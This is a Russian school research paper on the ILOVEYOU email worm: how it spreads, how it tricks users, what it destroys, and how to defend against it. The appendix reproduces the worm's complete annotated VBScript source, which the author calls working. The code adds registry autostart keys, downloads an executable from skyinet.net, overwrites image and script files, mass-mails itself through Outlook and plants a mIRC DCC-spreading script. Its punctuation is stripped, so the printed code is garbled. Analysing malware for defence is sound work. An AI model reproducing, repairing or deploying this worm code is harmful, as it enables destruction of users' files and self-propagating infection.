Интернет – червь I LOVE YOU (LOVE LETTER FOR YOU). Принцип работы. Меры безопасности для защиты от заражения и предотвращения деструктивных действий

МАЛАЯ АКАДЕМИЯ НАУК КРЫМА ИСКАТЕЛЬ Секция информатики Интернет червь I LOVE YOU LOVE LETTER FOR YOU. Принцип работы. Меры безопасности для защиты от заражения и предотвращения деструктивных действий.Действительный член МАН Крыма Искатель Ученик 11 класса Форосской общеобразовательной школы I III ступени г. Ялты КОРАБЛЕВ Андрей Научный руководитель КОРАБЛЕВ А. Б. Инженер - системотехник ВВЕДЕНИЕ. В настоящее время наблюдается безудержный рост числа пользователей глобальной сети Internet.

Все большее количество людей получает возможность оперативно получать необходимую информацию, обмениваться письмами, общаться по интересам и т.д. используя ресурсы Internet, который стал поистине глобальной компьютерной сетью. Развитие сети несет с собой рост компьютерной грамотности и способствует распространению компьютеров не только в учреждениях и банках, но и в домах людей, не являющихся специалистами по компьютерам.В последние годы возник новый вид пользователя пользователь домашнего компьютера, не являющийся специалистом компьютерщиком и в основном использующий компьютер для игр и для подключения к сети Internet.

И количество таких пользователей увеличивается в геометрической прогрессии. С одной стороны, рост компьютеризации имеет положительное значение компьютеры все больше входят в жизнь людей и облегчают ее. Однако, как и все медали, это явление имеет и оборотную сторону уровень подготовки пользователей все более снижается, все далее уходит от профессионализма.

Этому в немалой степени способствуют фирмы-изготовители программного обеспечения. В своих программных продуктах они максимально облегчают интерфейс, предельно уменьшают участие пользователя в работе программы, автоматизируя сам процесс работы.Использование языков высокого уровня, предельное упрощение и автоматизация процесса создания программ позволяет пользователям создавать программные продукты весьма неплохого качества даже при отсутствии глубоких знаний программирования и устройства компьютера.

При всех плюсах автоматизирования работы программных продуктов, выражающихся в облегчении работы с ними, существует и большой минус. Программисты, создающие программное обеспечение, вынуждены создавать операционные системы, имеющие гигантское количество так называемых внешних ручек управления иначе говоря, программных окон, позволяющих управлять работой одних программ при помощи других или при помощи скриптов.При этом, контроль за ходом выполнения программы со стороны пользователя не обязателен и в большинстве случаев не нужен.

Сложное разветвление скриптов и использование системного реестра операционной системой MS Windows 98 может послужить наглядным примером. Создатели данной операционной системы и великого множества приложений к ней постарались предельно облегчить жизнь простого пользователя и предельно автоматизировали их работу.Однако при этом они максимально облегчили жизнь и еще одному виду пользователя компьютерному вирмейкеру, создающему определенный тип программ компьютерные вирусы.

В течении последних года двух вирмейкеры резко поменяли цель своих усилий - вместо атак на операционные системы, память и системные области жесткого диска стали использоваться для проникновения в компьютер те же внешние ручки управления входящие в состав MS Office, MS Outlook, mIRC32 и другие приложения MS Windows.Статистика описаний новых вирусов, подключаемых к антивирусным базам программы AVP Е. Касперского, получаемая мной с сайта www.viruslist.com , говорит о том, что за период июня-июля 2000 года 80 из поступивших вирусов составили Internet-черви и Internet-троянцы, 15 - вирусы для MS Word и 5 - вирусы для почтовых программ IRC. За этот период практически не было обнаружено в диком виде ни одного вируса, проникающего в систему при помощи нестандартных функций операционных систем или при помощи работы напрямую с контроллерами внешних устройств.

Не используется и система прерываний BIOS и операционной системы как для проникновения, так и для осуществления деструктивных действий.

В основном для всего этого используются встроенные функции языка Visual Basic, Java, скриптов MS Word, Excel, Access. НАПРАВЛЕНИЯ РАЗВИТИЯ КОМПЬЮТЕРНЫХ ВИРУСОВ, НАМЕТИВШИЕСЯ В ПОСЛЕДНИЕ ГОДЫ. После появления MS Office 97 с развитой системой макросов и операционной системы MS Windows 98 со встроенными функциями Visual Basic и Java как бы открылись широкие ворота для всех видов проникновения в систему.При этом резко расширились возможности и для различных в том числе и деструктивных действий внутри системы.

Одними из первых ласточек этого типа вирусов был нашумевший вирус Melissa. И если внимательно проследить сейчас за сообщениями в компьютерной прессе и на информационных сайтах Internet, то они в последнее время напоминают сообщения с поля боя Вирус Melissa, парализовавший работу сети на долгое время, вирус Timofonica, вторгшийся в систему сотовой связи, каждый из вирусов приносит миллиардные убытки.По подсчетам экономистов убытки только в течение 2000 года превысили уже 25 миллиардов долларов И это только за последние полгода Мне очень захотелось подробно рассмотреть эти вирусы, понять, почему они смогли нанести такой большой вред множеству пользователей и провайдеров сети Internet, найти способы борьбы с ними и возможности избежать заражения в дальнейшем.

И поработать я решил с одним из нашумевших и принесших наиболее ощутимые убытки 10 млрд. долларов вирусом I LOVE YOU LOVE LETTER FOR YOU. АНАЛИЗ АЛГОРИТМА ИНТЕРНЕТ-ЧЕРВЯ I LOVE YOU LOVE LETTER FOR YOU. Компьютерный вирус I LOVE YOU по своей сути является одним из представителей класса вирусов Internet червем, распространяющемся по системе электронной почты и использующий для своего функционирования встроенные функции Visual Basic из состава MS Windows 98 при наличии установленного приложения Visual Basic и в MS Windows 95. Он интересен тем, что является первым из серии подобных вирусов.

В дальнейшем куски его кода и идеи, реализованные в нем, стали широко использоваться в других вирусах и в его клонах.

Исходный текст вируса получен мной из ресурсов Internet и является рабочим, поэтому использовать его необходимо со всеми предосторожностями Интернет червь I LOVE YOU в дальнейшем будем для удобства называть его вирус проникает в систему при получении по электронной почте письма с темой I LOVE YOU и присоединенным файлом LOVE LETTER FOR YOU.TXT. VBS в котором содержится код вируса.

При прочтении данного письма программой MS Outlook файл с телом вируса получает управление. Здесь стоит несколько отвлечься от хода алгоритма вируса и обратить ваше внимание на использование автором вируса знания психологии человека. Вирус для рассылки собственных копий это мы увидим далее использует адресную книгу приложений MS Outlook и mIRC. Как обычно, в адресную книгу заносятся адреса тех, кто человеку близок друзей, деловых партнеров, знакомых, родственников.Получив от кого-либо из этой категории людей письмо с признанием в любви, пользователь просто не сможет побороть желание открыть его. В этом то и заключается психологическое воздействие на пользователя со стороны автора вируса открыв письмо, пользователь запускает вирус на исполнение.

Для скрытия того, что файл с телом вируса является исполняемым файлом Visual Basic, автор использовал настройки самой системы MS Windows.Суть заключается в том, что по умолчанию в системе используется показ имени файла без расширения.

В результате на экране при просмотре списка файлов вместо файла LOVE-LETTERFORYOU.TXT.VBS, являющегося исполняемым файлом Visual Basic, пользователь видит LOVE-LETTERFORYOU. TXT, что дает ему основание считать его текстовым файлом, не могущим содержать в себе кода вируса. Большая часть пользователей использует настройки системы MS Windows по умолчанию.В теле вируса содержится копирайт автора студента из Манилы 1. После открытия письма для чтения читается файл с телом вируса 3 и запускается главная процедура работы вируса.

Вирус анализирует наличие запрета на обработку скриптов в системном реестре и если он есть, то путем изменения соответствующего ключа реестра снимает его 4. Далее вирус определяет пути к каталогам WIN, SYSTEM и TEMP 5. В каталог WIN копируется тело вируса под именем Win32.DLL.VBS, а в каталог SYSTEM копируется тело вируса в два файла с именами MSKernel32.vbs и LOVE-LETTER-FOR-YOU.TXT.VBS 6. Далее в реестре Windows создается ключ, который будет запускать вирус при каждой загрузке Windows.

Анализируется расположение приемного каталога электронной почты и если он не является корневым каталогом диска С, то он переназначается на С7. Это делается для того, чтобы в дальнейшем принятый файл WIN-BUGSFIX.EXE был расположен в корневом каталоге С. В каталоге SYSTEM ищется файл WinFAT32.exe и при его наличии генерируется случайное число в пределах 1-4 8. Если файл найден, то производится прописывание одного из четырех в зависимости от случайного числа адресов сайта www.skyinet.net в реестре в качестве стартовой страницы для MS Internet Explorer.

Устанавливается соединение и с сервера скачивается файл WIN-BUGSFIX.exe 9. Мои собственные попытки связаться с этим сайтом и вручную скачать файл для дальнейшего изучения закончились неудачей.Все четыре адреса на сайте отсутствуют. Если удалось скачать файл, то в реестре Windows создается ключ, который будет запускать его при каждой загрузке Windows 10 и стартовой страницей для MS Internet Explorer прописывается файл aboutblank.

На этом заканчивается внедрение вируса в систему, и он переходит к активным деструктивным действиям. Производится проверка типов дисков и поиск файлов по всем дискам.Далее проверяются расширения найденных файлов 11, и в соответствии с расширениями производятся деструктивные действия - если расширения .VBS или .VBE вирус записывает вместо них свое тело, не меняя расширения - если расширения .JS .JSE .CSS .WSH .SCT .HTA вирус записывает вместо них свое тело и меняет расширения на .VBS. Оригинальные файлы удаляются если расширения .JPG или .JPE вирус записывает вместо них свое тело и меняет расширения на .VBS. Оригинальные файлы удаляются если расширения файлов . MP2 .MP3 вирус создает файлы с такими же именами, но расширениями .VBS, а оригинальным файлам присваивает атрибут Hidden.

Алгоритм деструктивных действий очень прост и прозрачен.Автором для начинающих вирмейкеров оставлена возможность безудержно фантазировать и произвольно изменять а также расширять по своему усмотрению список расширений файлов, подвергающихся атаке. Поэтому после атаки оригинального вируса в течении трех дней мировая сеть была наводнена его клонами.

И клоны эти были уже направлены на файлы с расширениями .COM .EXE .DLL.INI и т.д. Закончив свои деструктивные действия на компьютере пользователя, вирус предпринимает действия для дальнейшего распространения среди пользователей сети Internet.В первую очередь он ищет в системе программу mIRC32, осуществляющую связь с чат-серверами и при ее наличии создает файл script.ini 12. В теле скрипта пишется грозное предупреждение о том, что запрещается редактировать этот скрипт это приведет к повреждению программы mIRC, а при поврежденной mIRC система не будет работать корректно.

Таким образом автор пытается предотвратить попытки пользователя очистить скрипт от лишнего содержимого.В скрипт включается запись, которая осуществляет рассылку всем участникам чата копии вируса в виде файла LOVE-LETTER- FOR-YOU.HTM 13. Сам файл содержится в теле вируса.

После попытки удачной или неудачной распространения своего тела среди участников чата, вирус предпринимает попытку распространения себя по электронной почте, используя при этом программу Microsoft Outlook Express 14. Вначале вирус получает доступ к адресной книге приложения Outlook 15, а затем организует цикл перебора адресов для создания писем со своим телом 16. Далее вирус создает тело письма с адресом отправителя, темой и текстом 17, присоединяет к письму файл с телом вируса 18 и отправляет его адресату.

Если в Outlook нет адресной книги или она пустая письма не создаются. Закончив свои процедуры вирус завершает работу не оставляя при этом своей резидентной копии в памяти компьютера. ОСОБЕННОСТИ АЛГОРИТМА ВИРУСА, ВЫВОДЫ И НЕКОТОРЫЕ РЕКОМЕНДАЦИИ ПО БОРЬБЕ С ПОДОБНЫМИ ТИПАМИ ВИРУСОВ. Подробный анализ алгоритма вируса позволяет сделать несколько выводов.Исследуемый вирус, его клоны и другие вирусы данного типа не являются чем-либо из ряда вон выходящим.

В нем используются достаточно простой алгоритм и механизм проникновения в систему. Хотелось бы отметить и то, что процесс проникновения в систему не использует каких либо функций, позволяющих скрыть свое присутствие в системе.В чем же состоит опасность вируса Исследуя его, я не увидел каких-либо ярко выраженных особенностей алгоритма и приемов стелсирования, однако ущерб от его деструктивных действий огромен.

Это кажется парадоксом. Внимательно исследуя алгоритм вируса и процесс его работы я пришел к выводу, что автор вируса умело использовал знания человеческой психологии, при этом предназначив вирус для той категории пользователей, которая сейчас очень многочисленна пользователей домашних персональных компьютеров, подключенных к сети Internet. Так же на этом вирусе попались недостаточно профессионально подготовленные системные администраторы узлов.Как же возможно противостоять атаке исследуемого вируса и подобных ему Алгоритм заражения и деструктивных действий может видоизменяться, но каналов проникновения в систему не так уж и много.

В связи с этим вирусописатели вынуждены использовать всевозможные приманки для пользователей. Мы уже видим, что в исследуемом вирусе использовано признание в любви в качестве приманки.Очень многие не смогли побороть искушения посмотреть, кто же так любит его. Так же возможны к использованию в качестве темы письма и такие варианты Вы хотите заработать за день 10000 долларов или бесплатные звонки в СЩА или мобильные телефоны за 1 без абонентской платы. Что бы я посоветовал пользователям, заинтересованным в защите от распространяющихся в последнее время как грибы после дождя интернет-червей 1. Никогда не читайте полученные по электронной почте письма с предложениями чего-либо бесплатного или очень дешевого, а так же любые другие заманчивые предложения.

В лучшем случае это может оказаться спамом.Обратитесь к системному администратору Вашего узла с просьбой проверить письмо на наличие нового вируса. 2. Никогда не оставляйте настроек Windows и его приложений в режиме по умолчанию.

Данный режим предназначен неизвестно для кого и очень молоинформативен.Если Вы используете какое-либо приложение Windows, то внимательно изучите инструкции по его использованию и описание программ, тогда Вам будет легче ориентироваться нормально ли работает приложение. 3. Используйте всегда свежее антивирусное программное обеспечение. Я посоветовал бы пользоваться антивирусом AVP лаборатории Евгения Касперского.

У меня на компьютере установлена версия 1.32 и на сайте лаборатори и я ежедневно получаю дополнения по Internet.Исходный текст вируса LOVE-LETTER-FOR-YOU I LOVE YOU с комментариями. rem barok -lovelettervbe i hate go to school Копирайты автора вируса, на основании rem by spyder ispydermail.com GRAMMERSoft Group Manila,Philippines которых сделан вывод о филиппинском про- On Error Resume Next исхождении вируса 1 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file ,vbscopy,dow eq ctr0 Set fso CreateObjectScripting.FileSystemObject Подготавливается окружение для работы вируса. 2 set file fso.OpenTextFileWScript.ScriptFullname,1 vbscopyfile.ReadAll Читается основной файл вируса 3 main Запускается главная процедура sub main On Error Resume Next dim wscr,rr set wscrCreateObjectWScript.Shell Если установлен запрет на rrwscr.RegReadHKEYCURRENTUSERSoftwareMic rosoftWindows Scripting HostSettingsTimeout обработку скриптов, то if rr 1 then изменением ключа в 4 wscr.RegWrite HKEYCURRENTUSERSoftwareMicrosoftWindows Scripting HostSettingsTimeout,0,REGDWORD реестре она разрешается. end if Set dirwin fso.GetSpecialFolder0 Определяются пути к каталогу WIN 5 Set dirsystem fso.GetSpecialFolder1 каталогу SYSTEM Set dirtemp fso.GetSpecialFolder2 каталогу TEMP Set c fso.GetFileWScript.ScriptFullName Определяется имя активного файла c. CopydirsystemMSKernel32.vbs В каталог SYSTEM копируется копия вируса 6 c.CopydirwinWin32DLL.vbs В каталог WIN копируется копия вируса c.CopydirsystemLOVE-LETTER-FOR-YOU.TXT.v bs В каталог SYSTEM копируется вторая копия вируса regruns Запускается процедура работы с реестром Windows html Запускается процедура работы с HTML файлами spreadtoemail Запускается процедура работы с электронной почтой listadriv Запускается процедура деструктивных действий end sub Процедура работы с реестром WINDOWS sub regruns On Error Resume Next Dim num,downread regcreate HKEYLOCALMACHINESoftwareMicrosoftWindows CurrentVersionRunMSKernel32,dirsystemMSK ernel32.vbs regcreate HKEYLOCALMACHINESoftwareMicrosoftWindows CurrentVersionRunServicesWin32DLL,dirwin Win32DLL.vbs Создается ключ в реестре, который будет запускать вирус при загрузке WINDOWS downread downreadreggetHKEYCURRENTUSERSoftwareMic rosoftInternet ExplorerDownload Directory Анализируется расположение каталога if downread then Download Directory и если он не является downreadc корневым каталогом диска С , то пере- end if назначается на C 7 if fileexistdirsystemWinFAT32.exe1 then Проверяется наличие в системном каталоге файла WinFAT32.exe 8 Randomize и при его наличии генерируется случайное число в пределах 1 - 4 num Int4 Rnd 1 if num 1 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,httpwww.skyinet.netyoung1sHJKhjnwer hjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsd f7679njbvYTWIN-BUGSFIX.exe elseif num 2 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,httpwww.skyinet.netangelcatskladjfl fdjghKJnwetryDGFikjUIyqwerWe546786324hjk 4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIX.exe elseif num 3 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,httpwww.skyinet.netkoichijf6TRjkcbG RpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvgWIN-BUGSFIX.exe elseif num 4 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,httpwww.skyinet.netchusdgfhjksdfjkl NBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjh PhjasfdglkNBhbqwebmznxcbvnmadshfgqw23746 1234iuy7thjgWIN-BUGSFIX.exe end if end if В случае наличия в системной директории файла WinFAT32.exe производится прописывание одного из четырех адресов сайта httpwww.skyinet.net в реестре в качестве стартовой страницы для Microsoft Internet Explorer в зависимости от сгенерированного случайного числа . С сервера скачивается файл WIN-BUGSFIX.exe. 9 if fileexistdownreadWIN-BUGSFIX.exe0 then regcreate HKEYLOCALMACHINESoftwareMicrosoftWindows CurrentVersionRunWIN-BUGSFIX,downreadWIN -BUGSFIX.exe regcreate HKEYCURRENTUSERSoftwareMicrosoftInternet ExplorerMainStart Page,aboutblank При наличии файла WIN-BUGSFIX.exe в каталоге Download C в реестре прописывается ключ для его запуска при загрузке Windows и стартовой страницей Microsoft Internet Explorer прописывается файл aboutblank 10 end if end sub Процедура деструктивных действий Подпрограмма поиска на дисках sub listadriv On Error Resume Next Dim d,dc,s Set dc fso.Drives For Each d in dc If d.DriveType 2 or d.DriveType3 Then Производится проверка типа дисков и поиск по всем дискам folderlistd.path end if Next listadriv s end sub Подпрограмма заражения файлов sub infectfilesfolderspec On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f fso.GetFolderfolderspec set fc f.Files for each f1 in fc extfso.

GetExtensionNamef1.path Проверяются расширения файлов 11 extlcaseext slcasef1.name if extvbs or extvbe then set apfso.OpenTextFilef1.path,2,true Если расширения файлов .VBS или .VBE, то вирус записывает себя вместо них. ap.write vbscopy ap.close elseifextjs or extjse or extcss or extwsh or extsct or exthta then Если расширения файлов .JS .JSE .CSS .WSH .SCT set apfso.OpenTextFilef1.path,2,true . HTA, то вирус также записывает себя вместо них ap.write vbscopy и меняет расширения на .VBS ap.close bnamefso.GetBaseNamef1.path set copfso.GetFilef1.path Вирус удаляет оригинальные файлы. cop.copyfolderspecbname.vbs fso.DeleteFilef1.path elseifextjpg or extjpeg then set apfso.OpenTextFilef1.path,2,true Если расширения файлов . JPG .JPE ,то вирус записывает себя вместо них и меняет расширения на .VBS ap.write vbscopy ap.close set copfso.GetFilef1.path cop.copyf1.path.vbs Вирус удаляет оригинальные файлы. fso.DeleteFilef1.path elseifextmp3 or extmp2 then set mp3fso.CreateTextFilef1.path.vbs Если расширения файлов .MP2 .MP3 ,то вирус создает файлы с такими же именами, но mp3.write vbscopy расширениями . VBS mp3.close set attfso.GetFilef1.path Вирус присваивает оригинальным файлам .MP2 или .MP3 атрибут Hidden att.attributesatt.attributes2 end if if eq folderspec then Вирус ищет в системе программу mIRC32 чат if smirc32.exe or smlink32.exe or smirc.ini or sscript.ini or smirc.hlp then и создает при ее наличии файл script.ini 12 set scriptinifso.CreateTextFilefolderspecscr ipt.ini Скрипт для программы mIRC32 script.ini scriptini.

WriteLine script scriptini.WriteLine mIRC Script scriptini.WriteLine Please dont edit this script mIRC will corrupt, if mIRC will scriptini.WriteLine corrupt WINDOWS will affect and will not run correctly. thanks scriptini.WriteLine scriptini.WriteLine Khaled Mardam-Bey scriptini.WriteLine httpwww.mirc.com scriptini.WriteLine scriptini.

WriteLine n0on 1JOIN scriptini.WriteLine n1 if nick me halt Эта часть скрипта осуществляет рассылку всем scriptini.WriteLine n2 .dcc send nick dirsystemLOVE-LETTER-FOR-YOU.HTM участникам чата копии вируса в виде HTM файла 13 scriptini.WriteLine n3 scriptini.close eqfolderspec end if end if next end sub sub folderlistfolderspec On Error Resume Next dim f,f1,sf set f fso.GetFolderfolderspec Вирус запоминает пути к зараженным файлам set sf f.SubFolders for each f1 in sf infectfilesf1.path folderlistf1.path next end sub Подпрограмма создания ключа в реестре sub regcreateregkey,regvalue Set regedit CreateObjectWScript.Shell Запись ключа в реестр regedit.

RegWrite regkey,regvalue end sub Подпрограмма чтения ключа в реестр function reggetvalue Set regedit CreateObjectWScript.Shell reggetregedit.RegReadvalue Проверка записи ключа в реестр end function function fileexistfilespec On Error Resume Next dim msg if fso.FileExistsfilespec Then msg 0 else msg 1 end if fileexist msg end function function folderexistfolderspec Данной процедурой вирус подготавливает отправку сообщений со своей копией по электронной почте.

On Error Resume Next 14 dim msg if fso.GetFolderExistsfolderspec then msg 0 else msg 1 end if fileexist msg end function Процедура рассылки копий вируса по электронной почте sub spreadtoemail On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit ,regv,regad set regeditCreateObjectWScript.Shell set outWScript.CreateObjectOutlook.Applicati on set mapiout.

GetNameSpaceMAPI Вирус получает доступ к адресной книге программы Outlook Express.15 for ctrlists1 to mapi.AddressLists.Count set amapi.AddressListsctrlists x1 regvregedit.RegReadHKEYCURRENTUSERSoftwa reMicrosoftWABa if regv then regv1 end if if inta.AddressEntries.Count intregv then for ctrentries1 to a. AddressEntries.Count maleada.AddressEntriesx Организуется цикл для рассылки по всем адресам адресной книги 16 regad regadregedit.RegReadHKEYCURRENTUSERSoftw areMicrosoftWABmalead if regad then set maleout.CreateItem0 Вирус создает тело письма с адресом отправителя, темой и male.Recipients.Addmalead текстом. 17 male.Subject ILOVEYOU male.Body vbcrlfkindly check the attached LOVELETTER coming from me. male. Attachments.AdddirsystemLOVE-LETTER -FOR-YOU.TXT.vbs Присоединяет к письму файл с телом вируса 18 male.Send Отсылает письмо адресату regedit.RegWrite HKEYCURRENTUSERSoftwareMicrosoftWABmalea d,1,REGDWORD end if xx1 next regedit.RegWrite HKEYCURRENTUSERSoftwareMicrosoftWABa,a.A ddressEntries.Count else Если нет адресной книги, то письма не создаются regedit.

RegWrite HKEYCURRENTUSERSoftwareMicrosoftWABa,a.A ddressEntries.Count end if next Set outNothing Set mapiNothing end sub Процедура создания HTM страницы sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5 ,dt6 dta1 HTML HEAD TITLE LOVELETTER - HTML -TITLE META NAME- Generator- CONTENT-BAROK VBS - LOVELETTER- vbcrlf META NAME-Author- CONTENT-spyder - ispydermail.com - GRAMMERSoft Group - Manila, Philippines - March 2000- vbcrlf META NAME-Description- CONTENT-simple but i think this is good vbcrlf -HEAD BODY ONMOUSEOUT-window.name-main-window.open- LOVE-LETTER-FOR-YOU.HTM main vbcrlf ONKEYDOWN-window.name-main-window.open-L OVE-LETTER-FOR-YOU.HTM main BGPROPERTIES-fixed- BGCOLOR-FF9933- vbcrlf CENTER p This HTML file need ActiveX Control -p p To Enable to read this HTML file BR - Please press -YES- button to Enable ActiveX -p vbcrlf - CENTER MARQUEE LOOP-infinite- BGCOLOR-yellow- z z -MARQUEE vbcrlf -BODY -HTML vbcrlf SCRIPT language-JScript- vbcrlf vbcrlf if window.screenvar wiscreen.availWidthvar hiscreen.availHeightwindow.moveTo0,0wind ow.resizeTowi,hivbcrlf vbcrlf -SCRIPT vbcrlf SCRIPT LANGUAGE-VBScript- vbcrlf vbcrlf on error resume nextvbcrlf dim fso,dirsystem,wri,code,code2,code3,code4 ,aw,regditvbcrlf aw1vbcrlf code dta2set fsoCreateObject- Scripting.FileSystemObje ct-vbcrlf set dirsystemfso.GetSpecialFolder1vbcrlf code2replacecode,chr91chr45chr91,chr39vb crlf code3replacecode2,chr93chr45chr93,chr34v bcrlf code4replacecode3,chr37chr45chr37,chr92v bcrlf set wrifso.CreateTextFiledirsystem MSKernel32.vbs-vbcrlf wri.write code4vbcrlf wri.closevbcrlf if fso.FileExistsdirsystem MSKernel32.vbs- thenvbcrlf if err.number424 thenvbcrlf aw0vbcrlf end ifvbcrlf if aw1 thenvbcrlf document.write -ERROR can-t initialize ActiveX-vbcrlf window.closevbcrlf end ifvbcrlf end ifvbcrlf Set regedit CreateObject-WScript.Shell-vbcrlf regedit.RegWrite -HKEYLOCALMACHINE-Software-Microsoft-Win dows-CurrentVersion-Run-MSKernel32 dirsystem MSKernel32.vbs-vbcrlf vbcrlf - SCRIPT dt1replacedta1,chr35chr45chr35, dt1replacedt1,chr64chr45chr64, dt4replacedt1,chr63chr45chr63, dt5replacedt4,chr94chr45chr94, dt2replacedta2,chr35chr45chr35, dt2replacedt2,chr64chr45chr64, dt3replacedt2,chr63chr45chr63, dt6replacedt3,chr94chr45chr94, set fsoCreateObjectScripting.FileSystemObjec t set cfso.OpenTextFileWScript.ScriptFullName, 1 linesSplitc.ReadAll,vbcrlf l1uboundlines for n0 to uboundlines linesnreplacelinesn chr91chr45chr91 linesnreplacelinesn chr93chr45chr93 linesnreplacelinesn chr37chr45chr37 if l1n then linesnchr34linesnchr34 else linesnchr34linesnchr34vbcrlf end if next set bfso.CreateTextFiledirsystemLOVE-LETTER- FOR-YOU.HTM b.close set dfso.OpenTextFiledirsystemLOVE-LETTER-FO R-YOU.HTM,2 d.write dt5 d.write joinlines,vbcrlf d.write vbcrlf d.write dt6 d.close end sub С О Д Е Р Ж А Н И Е. 1. Введение . 2 2. Направления развития компьютерных вирусов, наметившиеся в последнее время . 3 3. Анализ алгоритма интернет-червя I LOVE YOU LOVE LETTER FOR YOU 4 4. Особенности алгоритма вируса, выводы и некоторые рекомендации по борьбе с подобными типами вирусов. 7 5. Приложение с описанием вируса 9.